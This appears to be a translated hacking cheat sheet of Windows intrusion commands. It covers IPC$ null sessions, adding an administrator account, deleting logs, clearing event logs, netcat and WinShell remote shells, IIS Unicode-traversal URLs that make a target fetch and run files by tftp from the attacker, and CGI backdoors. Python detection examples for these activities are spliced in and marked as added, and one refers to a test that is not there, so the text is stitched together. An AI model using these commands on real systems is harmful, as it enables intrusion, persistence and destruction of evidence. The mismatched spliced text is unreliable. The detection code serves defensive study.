Commands administrators and hackers must know _ Application Tips

Source: Internet
Author: User
Tags: net, time, system, log
Commands administrators and hackers must know

A few common net commands:

(Establish a null-session IPC$ connection to a remote host) net use \\IP address\ipc$ "" /user:""

(Log in to the remote host as Administrator) net use \\IP address\ipc$ "password" /user:"Administrator"

(Copy a file to the remote host's Winnt directory) copy local_path\program \\IP address\admin$

(View the remote host's time) net time \\IP address

(Start a program at a scheduled time) at \\IP address 02:18 Readme.exe

(View shares) net view \\IP address

(View the NetBIOS name table; -A takes an IP address, -a a host name) nbtstat -A IP address

(Map the remote host's C drive to local drive F) net use F: \\IP address\c$ "" /user:"Administrator"

(These two commands add a user and put it in the Administrators group): net user username password /add

net localgroup Administrators username /add

(Disconnect) net use \\IP address\ipc$ /delete
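Seen from the defending side, the net use / copy / at sequence above leaves share-access records on the target. The following is an added example (not from the original page) that groups constructed Windows Security Event ID 5140 records by source address and flags a source that both opens IPC$ anonymously and touches an administrative share. The field names follow the 5140 event, the sample records are constructed, and the ADMIN_SHARES set is an assumption.

```python
from collections import defaultdict

# Constructed sample records modelled on Security Event ID 5140
# ("A network share object was accessed") and 4624 (logon). Not real logs.
SAMPLE_EVENTS = [
    {"EventID": 5140, "ShareName": r"\\*\IPC$", "SubjectUserName": "ANONYMOUS LOGON",
     "SubjectDomainName": "NT AUTHORITY", "IpAddress": "10.0.0.99"},
    {"EventID": 5140, "ShareName": r"\\*\ADMIN$", "SubjectUserName": "Administrator",
     "SubjectDomainName": "SRV01", "IpAddress": "10.0.0.99"},
    {"EventID": 5140, "ShareName": r"\\*\C$", "SubjectUserName": "Administrator",
     "SubjectDomainName": "SRV01", "IpAddress": "10.0.0.99"},
    {"EventID": 5140, "ShareName": r"\\*\Public", "SubjectUserName": "alice",
     "SubjectDomainName": "CORP", "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "alice", "IpAddress": "10.0.0.5"},
]

# Assumption: the hidden administrative shares worth alerting on.
ADMIN_SHARES = {"ADMIN$", "C$", "D$"}


def share_name(event):
    # Reduce \\*\ADMIN$ (or \\srv01\ADMIN$) to the bare share name, upper-cased.
    return event.get("ShareName", "").rsplit("\\", 1)[-1].upper()


def classify(event):
    """Label one event: null_session, admin_share_access, ipc_authenticated, or None."""
    if event.get("EventID") != 5140:
        return None
    name = share_name(event)
    user = event.get("SubjectUserName", "").upper()
    if name == "IPC$" and user == "ANONYMOUS LOGON":
        return "null_session"
    if name in ADMIN_SHARES:
        return "admin_share_access"
    if name == "IPC$":
        return "ipc_authenticated"
    return None


def findings_by_source(events):
    """Map source IP -> ordered list of labels for its share-access events."""
    by_ip = defaultdict(list)
    for ev in events:
        label = classify(ev)
        if label:
            by_ip[ev.get("IpAddress", "?")].append(label)
    return dict(by_ip)


def high_risk_sources(events):
    """Sources that opened IPC$ anonymously and then reached an admin share:
    the footprint of the net use ... ipc$ followed by copy ... admin$ sequence."""
    return sorted(ip for ip, labels in findings_by_source(events).items()
                  if "null_session" in labels and "admin_share_access" in labels)


if __name__ == "__main__":
    for ip, labels in findings_by_source(SAMPLE_EVENTS).items():
        print(ip, labels)
    print("high risk:", high_risk_sources(SAMPLE_EVENTS))
```

The grouping by source address is the point: a single IPC$ connection is routine, but the same source opening IPC$ anonymously and then reaching ADMIN$ or C$ within one session is what the command sequence above produces.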
Clearing logs:

del C:\winnt\system32\logfiles\*.*

del C:\winnt\system32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

I. Netsvc.exe

The following commands list the services on the host, query the Schedule (Task Scheduler) service, and start it remotely:

netsvc /list \\IP address

netsvc schedule \\IP address /query

netsvc schedule \\IP address /start

II. OpenTelnet.exe

Remotely start the host's Telnet service and bind it to port 7878, for example:

opentelnet \\IP address username password 1 7878

You can then telnet to port 7878 on the host and get a command prompt:

telnet IP address 7878
III. Winshell.exe

A very small trojan (under 6 KB). Telnet to port 7878 on the host and enter the password WinShell; when you see the cmd> prompt, you can type the following commands:

P Path (view the path of the WinShell main program)

b reBoot (reboot the machine)

D ShutDown (shut down the machine)

S Shell (you will see the familiar "c:\>" prompt after execution)

X exit (exit this logon session; this command does not terminate WinShell)

cmd> http://.../srv.exe (download a file from another site via HTTP to the machine running WinShell)

IV. 3389 login tool (Terminal Services client): a GUI way to log in to the remote host

V. Elsave.exe

Event log cleanup tool:

elsave -s \\IP address -l "Application" -C

elsave -s \\IP address -l "System" -C

elsave -s \\IP address -l "Security" -C

After execution the Application, System and Security logs are cleared.
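Both the del commands under "Clearing logs" and the elsave commands above remove evidence, and both leave their own trace: clearing an event log writes Security 1102 (audit log cleared) or Eventlog provider 104 (other log cleared), and deleting log files shows up in file-deletion telemetry. The following is an added example, not from the page or any of the tools it names, that runs both checks over a constructed JSON-lines feed. Field names are modelled on the Windows events and on Sysmon Event ID 23/26 (file delete); "ClearedChannel" is this example's own name for the log named inside a 104 event, and the sample records are constructed.

```python
import json
import re

# Constructed sample feed: one JSON object per line (not real logs).
SAMPLE_LOG = r"""
{"Channel":"Security","EventID":1102,"SubjectUserName":"Administrator","Computer":"SRV01"}
{"Channel":"System","EventID":104,"Provider":"Microsoft-Windows-Eventlog","ClearedChannel":"Application","SubjectUserName":"Administrator","Computer":"SRV01"}
{"Channel":"Microsoft-Windows-Sysmon/Operational","EventID":23,"TargetFilename":"C:\\WINNT\\system32\\LogFiles\\W3SVC1\\ex010312.log","User":"SRV01\\Administrator","Computer":"SRV01"}
{"Channel":"Microsoft-Windows-Sysmon/Operational","EventID":23,"TargetFilename":"C:\\WINNT\\system32\\config\\SecEvent.Evt","User":"SRV01\\Administrator","Computer":"SRV01"}
{"Channel":"Microsoft-Windows-Sysmon/Operational","EventID":23,"TargetFilename":"C:\\Users\\alice\\notes.txt","User":"CORP\\alice","Computer":"WS07"}
{"Channel":"Security","EventID":4624,"LogonType":2,"TargetUserName":"alice","Computer":"WS07"}
"""

# Log locations the del commands above target (matched case-insensitively).
LOG_PATH_PATTERNS = [
    re.compile(r"\\system32\\logfiles\\", re.I),
    re.compile(r"\\system32\\config\\[^\\]+\.evt$", re.I),
    re.compile(r"\\system32\\dtclog\\", re.I),
    re.compile(r"\\(winnt|windows)\\(system32\\)?[^\\]+\.(log|txt)$", re.I),
]


def parse_events(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_log_cleared(ev):
    """Security 1102 = audit log cleared; Eventlog provider 104 = another log cleared."""
    if ev.get("Channel") == "Security" and ev.get("EventID") == 1102:
        return True
    return ev.get("EventID") == 104 and ev.get("Provider") == "Microsoft-Windows-Eventlog"


def is_log_file_delete(ev):
    """Sysmon 23/26 file deletion whose path is a known log location."""
    if ev.get("EventID") not in (23, 26):
        return False
    path = ev.get("TargetFilename", "")
    return any(p.search(path) for p in LOG_PATH_PATTERNS)


def detect(text):
    """Return (kind, computer, detail, user) tuples for log-tampering events."""
    alerts = []
    for ev in parse_events(text):
        user = ev.get("SubjectUserName") or ev.get("User", "?")
        if is_log_cleared(ev):
            alerts.append(("event_log_cleared", ev["Computer"],
                           ev.get("ClearedChannel", ev["Channel"]), user))
        elif is_log_file_delete(ev):
            alerts.append(("log_file_deleted", ev["Computer"], ev["TargetFilename"], user))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(*alert)
```

Because the 1102/104 records are written by the event log service itself as the clear happens, forwarding them off the host (so that a later clear cannot remove them) is what makes this check reliable.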

VI. Hbulot.exe

Enables the 3389 (Terminal Services) service on Win2k Server and WinXP:

hbulot [/r]

Using /r makes the target reboot automatically after installation completes so that the setting takes effect.

VII. Nc.exe (Netcat.exe)

A good tool: some scripts depend on it, and it is also used to obtain a connection after an overflow.

To connect somewhere: nc [-options] hostname port[s] [ports] ...

To bind a port and wait for a connection: nc -l -p port [-options] [hostname] [port]

Parameters:

-e prog   program to redirect to once connected (execute) [dangerous!!]

-g gateway   source-routing hop point(s), up to 8

-G num   source-routing pointer: 4, 8, 12, ...

-h   help

-i secs   delay interval for lines sent or ports scanned

-l   listen mode, for inbound connections

-n   numeric-only IP addresses, no DNS; cannot be used with a hostname

-o file   hex dump of the traffic to a file

-p port   local port number

-r   randomize local and remote ports

-s addr   local source address

-u   UDP mode

-v   verbose output; use -vv for more detail

-w secs   timeout for connects and final net reads

-z   zero-I/O mode (used for scanning)
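The option list above is also what a defender matches on: -l plus -e is a bind shell, -e without -l a reverse shell, -z a scan. The following is an added example, not from the page or the netcat project, that parses netcat-style command lines the way the tool does (clustered flags such as -lvp 4444 and attached values such as -p4444 included) and scores them. The process command lines are constructed, the set of binary names and the list of shells are assumptions, and the letter classes come from the option list above.

```python
# Option letters that take a value, and boolean flags, per the list above.
ARG_OPTS = set("egGiopsw")
FLAG_OPTS = set("hlnruvz")
# Assumption: names the binary is commonly found under, and the shells worth flagging.
NC_NAMES = {"nc", "nc.exe", "netcat", "netcat.exe", "ncat", "ncat.exe"}
SHELLS = ("cmd.exe", "cmd", "sh", "bash", "powershell.exe", "powershell")

# Constructed sample command lines, as seen in Sysmon Event ID 1 / Security 4688.
SAMPLE_CMDLINES = [
    r'C:\temp\nc.exe -l -p 7878 -e cmd.exe',
    'nc -lvp 4444',
    'nc.exe 10.0.0.5 443 -e cmd.exe',
    'nc -zv 10.0.0.5 1-1024',
    'ping 10.0.0.5',
]


def parse_nc_args(tokens):
    """Parse netcat-style options. Returns (options dict, positional args);
    value options map to their string, flags to a count (so -vv -> 2)."""
    opts, positional, i = {}, [], 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-") and len(tok) > 1:
            letters = tok[1:]
            for j, ch in enumerate(letters):
                if ch in ARG_OPTS:
                    rest = letters[j + 1:]
                    if rest:
                        opts[ch] = rest                  # attached form: -p4444
                    else:
                        i += 1                           # value is the next token
                        opts[ch] = tokens[i] if i < len(tokens) else ""
                    break                                # a value ends the cluster
                opts[ch] = opts.get(ch, 0) + 1           # boolean flag (unknown letters counted too)
        else:
            positional.append(tok)
        i += 1
    return opts, positional


def assess(cmdline):
    """Classify one process command line; None if it is not a netcat invocation."""
    tokens = cmdline.replace('"', "").split()
    if not tokens:
        return None
    exe = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in NC_NAMES:
        return None
    opts, positional = parse_nc_args(tokens[1:])
    tags = []
    if "e" in opts:
        tags.append("bind_shell" if "l" in opts else "reverse_shell")
        if opts["e"].lower().rsplit("\\", 1)[-1] in SHELLS:
            tags.append("shell_exec")
    elif "l" in opts:
        tags.append("listener")
    if "z" in opts:
        tags.append("port_scan")
    # Port comes from -p in listen mode, else from the second positional (host port).
    port = opts.get("p") or (positional[1] if len(positional) > 1 else None)
    severity = "high" if "e" in opts else ("medium" if tags else "low")
    return {"severity": severity, "tags": tags, "port": port, "exec": opts.get("e")}


def scan_cmdlines(lines):
    """Return (cmdline, assessment) for every netcat invocation in the input."""
    found = []
    for line in lines:
        result = assess(line)
        if result is not None:
            found.append((line, result))
    return found


if __name__ == "__main__":
    for line, result in scan_cmdlines(SAMPLE_CMDLINES):
        print(result["severity"], result["tags"], "<-", line)
```

Parsing the flags rather than substring-matching "-e" matters because the same invocation can be spelled -l -p 7878 -e cmd.exe or -lp7878 -ecmd.exe; the parser sees both as the same bind shell.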
VIII. TFTPD32.exe

Temporarily turns your computer into a TFTP server so that the compromised host (called a "broiler" in the source) can download files from it. The tftp command is executed on the compromised host, usually through the Unicode vulnerability or a telnet session, for example:

http://IP address/scripts/.%255c..%255c/winnt/system32/cmd.exe?/c tftp -i local IP address get file name c:\winnt\system32\file name

You can then run the file directly:

http://IP address/scripts/.%255c..%255c/winnt/system32/cmd.exe?/c+file name

IX. Prihack.exe is a remote buffer overflow tool for the IIS printer ISAPI. Idqover.exe overflows idq: choose "listen on a port after overflow", then use telnet to connect to its listening port; if the overflow succeeds, the bound command executes immediately.

Xploit.exe is a graphical interface to the IDA overflow, after successful WinXP need to play WinXP.

X. Ntis.exe, Cmd.exe and cmdasp.asp are three CGI backdoors: the .exe files are placed in the cgi-bin directory and the .asp file in a directory with execute permissions. Then connect with the IE browser.

XI. Xscan command-line parameter description:

During detection, press the space key to view the status of each thread and the scan progress, press Q to save the current data and exit early, and press Ctrl+C to force the program to close.

1. Command format: xscan -host <start IP>[-<end IP>] <detection items> [other options]

xscan -file <host list file name> <detection items> [other options]

The <detection items> have the following meanings:

-port: detects the port status of common services (the list of ports to test can be set through the "port-scan-options\port-list" item of the \dat\config.ini file);

-ftp: detects weak FTP passwords (the username/password dictionary files can be set through the \dat\config.ini file);

-ntpass: detects weak NT-Server passwords (the username/password dictionary files can be set through the \dat\config.ini file);

-cgi: detects CGI vulnerabilities (the encoding scheme can be set through the "Cgi-encode\encode_type" item of the \dat\config.ini file);

-iis: detects IIS vulnerabilities (the encoding scheme can be set through the "Cgi-encode\encode_type" item of the \dat\config.ini file);

The other options have the following meanings:

-v: show detailed scan progress

-p: skip hosts that do not respond to ping

-o: skip hosts on which no open ports are detected

-t <concurrent threads[,concurrent hosts]>: specifies the maximum number of concurrent threads and concurrent hosts; the defaults are 100 and 10
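The -port sweep above, run with the default 100 threads, is exactly the pattern a network-side detector looks for: one source touching many distinct destination ports in a short window. The following is an added example, not from the page or the Xscan project, that replays constructed connection records through a per-source sliding window and raises one alert per source when the number of distinct (host, port) targets in the window crosses a threshold. The log line format, the 60-second window and the 10-target threshold are assumptions; the records are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed record format: "<ISO timestamp> <src> -> <dst>:<port> <flag>".
LINE_RE = re.compile(r"^(\S+) (\d+\.\d+\.\d+\.\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+) (\w+)$")


def build_sample():
    """Constructed connection records: one scanner sweeping 20 ports on one
    host at one port per second, one ordinary client reusing ports 80/443."""
    base = datetime(2024, 1, 1, 10, 0, 0)
    lines = []
    for k, port in enumerate(range(21, 41)):
        lines.append(f"{(base + timedelta(seconds=k)).isoformat()} 10.0.0.99 -> 10.0.0.5:{port} SYN")
    for k in range(30):
        port = 80 if k % 2 else 443
        lines.append(f"{(base + timedelta(seconds=k)).isoformat()} 10.0.0.7 -> 10.0.0.5:{port} SYN")
    return lines


def parse_line(line):
    """Return (timestamp, src, dst, port, flag) or None for an unparseable line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, src, dst, port, flag = m.groups()
    return datetime.fromisoformat(ts), src, dst, int(port), flag


def detect_scans(lines, window_seconds=60, target_threshold=10):
    """Sliding-window scan detector. Returns (src, time, distinct_targets)
    once per source the first time its distinct targets in the window
    reach the threshold."""
    events = sorted(e for e in map(parse_line, lines) if e is not None)
    recent = defaultdict(deque)          # src -> deque of (ts, (dst, port))
    alerted, alerts = set(), []
    for ts, src, dst, port, _flag in events:
        q = recent[src]
        q.append((ts, (dst, port)))
        # Drop entries that fell out of the window.
        while q and ts - q[0][0] > timedelta(seconds=window_seconds):
            q.popleft()
        distinct = {target for _, target in q}
        if len(distinct) >= target_threshold and src not in alerted:
            alerted.add(src)
            alerts.append((src, ts, len(distinct)))
    return alerts


if __name__ == "__main__":
    for src, ts, n in detect_scans(build_sample()):
        print(f"{ts.isoformat()} scan from {src}: {n} distinct targets in window")
```

Counting distinct targets rather than raw connections is what keeps the busy but legitimate client out of the alert list; shrinking the window (or a scanner slowing down past it) trades detection for fewer false positives, which the second assertion in the test makes visible.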
